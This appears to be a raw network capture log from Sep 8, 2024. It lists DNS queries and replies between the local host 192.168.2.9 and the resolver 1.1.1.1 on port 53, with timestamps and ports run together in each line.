                                                                                                                                                                                                          Sep 8, 2024 10:54:15.052751064 CEST5865153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053719997 CEST5621553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.053762913 CEST53576471.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.054284096 CEST5749253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.056998014 CEST53529781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.061641932 CEST53620321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.062048912 CEST53590101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.063867092 CEST53562151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.065130949 CEST53574921.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068511009 CEST53627581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068876982 CEST6260353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.068995953 CEST53586511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069070101 CEST6449853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069262028 CEST5471053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069400072 CEST5479653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069562912 CEST5191453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.069727898 CEST5818053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070072889 CEST6344153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070291996 CEST6100053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070429087 CEST5565153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.070619106 CEST5347853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071643114 CEST5086153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.071804047 CEST6356953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072004080 CEST6056053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072221041 CEST5723653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.072242975 CEST6120853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.073992968 CEST5264953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.075388908 CEST53540221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.078457117 CEST53547961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079030037 CEST53610001.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079078913 CEST5679053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079132080 CEST53547101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079243898 CEST5398253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079391003 CEST53644981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079402924 CEST5219153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.079755068 CEST53581801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080049038 CEST5803053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080204964 CEST53534781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080230951 CEST5354153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080405951 CEST6201453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080549955 CEST6531153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080570936 CEST53526491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080580950 CEST53635691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.080969095 CEST53508611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.081769943 CEST53612081.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.081927061 CEST53572361.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.083241940 CEST53605601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.085827112 CEST53634411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089137077 CEST53521911.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089330912 CEST53539821.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.089766979 CEST53580301.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.090154886 CEST53620141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.093966961 CEST53535411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.098793983 CEST53626031.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.109055996 CEST53567901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135046959 CEST6019553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135236025 CEST5393153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.135412931 CEST6418153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.136312962 CEST4941453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.145813942 CEST53601951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.146142006 CEST53641811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.146645069 CEST53494141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.151515007 CEST53539311.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.204488039 CEST53585951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.226582050 CEST53519141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.228847027 CEST53556511.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:15.245719910 CEST53653111.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.965338945 CEST5448753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966331959 CEST6145253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.966898918 CEST5947253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969425917 CEST4948153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.969644070 CEST6057053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.970660925 CEST5557153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.971765995 CEST6461553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972218037 CEST5145353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972635031 CEST6417053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.972774029 CEST5903553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973210096 CEST5048353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973578930 CEST5839053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.973633051 CEST6155053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974359989 CEST5966353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974360943 CEST6547353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.974842072 CEST4964153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.975255013 CEST5054253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976052046 CEST5889453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976309061 CEST5499853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.976914883 CEST6374453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977085114 CEST5311053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977339029 CEST5129653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977801085 CEST5611453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.977987051 CEST5649353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978353977 CEST5782553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978521109 CEST6451653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.978801012 CEST6106753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979181051 CEST5574553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.979803085 CEST6114053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.981178999 CEST6042753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.982916117 CEST5238853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.983922005 CEST5427553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.984848022 CEST6137853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.985395908 CEST5398453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.986912012 CEST5312753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.987652063 CEST6442253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.988557100 CEST5610753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.989433050 CEST6308453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.990006924 CEST5915753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.991187096 CEST5987753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.994168997 CEST6027153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.997823000 CEST5707753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:16.998866081 CEST5068153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.000338078 CEST5766853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.001135111 CEST5320553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.002291918 CEST5969053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.003737926 CEST5146053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.004354000 CEST5429453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.005032063 CEST6419853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.006616116 CEST5120553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.007662058 CEST5891453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.008289099 CEST5106953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.008933067 CEST5696153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.010377884 CEST5034253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.011132002 CEST6040153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.012187004 CEST4943753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.012876987 CEST5944553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.013719082 CEST5415253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.014749050 CEST5688953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.015338898 CEST5942253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.016204119 CEST5121953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.016865015 CEST6384953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.252929926 CEST53594721.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253360987 CEST53615501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253456116 CEST53605701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253611088 CEST53496411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253727913 CEST53514531.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253772974 CEST53614521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253796101 CEST53641701.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.253941059 CEST53561141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254120111 CEST53596631.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254266024 CEST53578251.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254453897 CEST53539841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254462957 CEST53588941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254708052 CEST53531101.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254743099 CEST53494811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254832983 CEST53549981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254841089 CEST53613781.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.254873037 CEST53591571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255111933 CEST53602711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255166054 CEST53604011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255175114 CEST53512051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255270004 CEST53630841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255312920 CEST53557451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255321980 CEST53604271.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255331039 CEST53544871.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255359888 CEST53594221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255429983 CEST53532051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255534887 CEST53638491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255542994 CEST53541521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255620003 CEST53589141.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255646944 CEST53596901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255734921 CEST53503421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255786896 CEST53644221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255795956 CEST53576681.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255808115 CEST53523881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.255969048 CEST53568891.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.256022930 CEST53641981.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.256923914 CEST53610671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.257066011 CEST53494371.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.259639025 CEST53504831.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.259716988 CEST53505421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.259841919 CEST53583901.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.260298014 CEST53646151.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.260304928 CEST53512961.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261101961 CEST53590351.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261111021 CEST53531271.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261194944 CEST53598771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261203051 CEST53654731.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261399984 CEST53594451.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261755943 CEST53542941.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.261765003 CEST53570771.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.262161970 CEST53506811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.264959097 CEST53512191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.275149107 CEST53637441.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.275257111 CEST53555711.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.275352955 CEST53561071.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.275948048 CEST53569611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.276304960 CEST53542751.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.276541948 CEST53645161.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.277512074 CEST53510691.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.398720980 CEST53611401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.409719944 CEST53514601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:17.416919947 CEST53564931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.666294098 CEST5444153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.668104887 CEST5710953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.675250053 CEST6118053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.678524971 CEST5647953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.678868055 CEST53544411.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.678956985 CEST6121953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.679440975 CEST53571091.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.680334091 CEST5879353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.681132078 CEST6118153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.681828976 CEST5897453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.682166100 CEST6506453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.682676077 CEST6298453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683229923 CEST5886753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683459997 CEST5635853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.683887005 CEST5161853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.684241056 CEST5272453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.684602022 CEST53611801.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.689390898 CEST53587931.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.689703941 CEST4949553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.689951897 CEST5668853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.690922022 CEST53564791.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.691772938 CEST53650641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.692675114 CEST5838953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.693072081 CEST53563581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.696855068 CEST53589741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.698812962 CEST53494951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.698823929 CEST53629841.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.701200962 CEST53516181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.706082106 CEST53566881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.710500956 CEST6091853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711047888 CEST6044353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711389065 CEST53612191.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711400032 CEST53611811.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.711853027 CEST5727453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.715234995 CEST53527241.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.721354008 CEST53572741.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.721472025 CEST53604431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.724333048 CEST5420553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.727124929 CEST53609181.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.730406046 CEST6076053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.734497070 CEST4975953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.735188007 CEST5473253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.735358953 CEST53542051.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.737905979 CEST5232253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.738734007 CEST5456453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.738807917 CEST5005853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.739784956 CEST6475053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.740231037 CEST5771353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.741568089 CEST5755253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.743910074 CEST5114853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.744091034 CEST6419553192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.747504950 CEST53607601.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748126984 CEST6266753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748579025 CEST53523221.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748730898 CEST5478853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748950958 CEST6114953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749342918 CEST53500581.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749371052 CEST53647501.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.749381065 CEST53577131.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750422001 CEST53497591.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750746965 CEST6192353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750929117 CEST5534253192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751094103 CEST4955753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751200914 CEST53575521.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751616001 CEST5024053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752652884 CEST5715353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752916098 CEST5084353192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753098965 CEST6450153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753537893 CEST53641951.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753873110 CEST53511481.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.755970955 CEST53545641.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.758691072 CEST53611491.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.758729935 CEST53547881.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.758932114 CEST53626671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.759895086 CEST53553421.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.760288954 CEST53495571.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.760509968 CEST53619231.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.761668921 CEST6296153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.761857033 CEST4986753192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.764540911 CEST53508431.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.765830994 CEST53645011.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.766362906 CEST53547321.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.768074036 CEST53502401.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.770375967 CEST5776953192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.770685911 CEST6352853192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.770981073 CEST53629611.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.780577898 CEST6378653192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.780772924 CEST5126153192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.782294989 CEST53498671.1.1.1192.168.2.9
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.783931017 CEST6193453192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784470081 CEST6543053192.168.2.91.1.1.1
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784698963 CEST5045753192.168.2.91.1.1.1
